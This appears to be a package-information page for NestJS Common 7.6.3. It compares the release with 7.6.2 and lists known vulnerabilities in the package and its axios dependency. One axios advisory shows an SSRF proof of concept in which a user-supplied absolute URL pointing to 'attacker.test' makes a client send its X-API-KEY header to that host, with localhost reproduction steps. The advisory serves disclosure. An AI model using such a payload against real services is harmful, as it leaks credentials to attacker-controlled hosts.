NestJS Common, a fundamental module in the NestJS framework, saw a minor version bump from 7.6.2 to 7.6.3 on December 17th, 2020. While the descriptions remain identical, and dependencies like uuid, axios, tslib, and iterare are unchanged, both versions rely on the same peer dependencies such as rxjs, cache-manager, class-validator, reflect-metadata, and class-transformer. The core functionality, licensing (MIT), repository, author, and funding details also stay consistent. Examining the dist section reveals that both versions contain the same number of files (320) and the same unpacked size (308761), meaning there are no structural changes or file additions.
The crucial difference lies in the releaseDate, where version 7.6.3 was published at 11:29:10.393Z, a few hours after version 7.6.2, published at 07:45:41.709Z. This points to a hotfix or a minor bug fix implemented between the two releases. For developers, upgrading from 7.6.2 to 7.6.3 is recommended, albeit likely involving subtle internal improvements rather than significant feature additions. Given the unchanged file count and unpacked size, one can infer that only limited source code changes or potentially build process adjustments were made. For projects starting fresh with NestJS, using the latest stable version (7.6.3 at the time described by this data) is always the best practice to benefit from the latest cumulative improvements and bug fixes, which could enhance stability and overall performance.
All the vulnerabilities related to the version 7.6.3 of the package
nest allows a remote attacker to execute arbitrary code via the Content-Type header
File Upload vulnerability in nestjs nest prior to v.11.0.16 allows a remote attacker to execute arbitrary code via the Content-Type header.
Axios vulnerable to Server-Side Request Forgery
Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.
axios Inefficient Regular Expression Complexity vulnerability
axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity.
Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL
is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/
instead of the baseURL
. As a result, the domain owner of attacker.test
would receive the X-API-KEY
included in the request headers.
It is recommended that:
baseURL
is set, passing an absolute URL such as http://attacker.test/
to get()
should not ignore baseURL
.baseURL
with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL
.Follow the steps below to reproduce the issue:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
$ node main.js
this is server2
Even though baseURL
is set to http://localhost:10001/
, axios sends the request to http://localhost:10002/
.
baseURL
and does not validate path parameters is affected by this issue.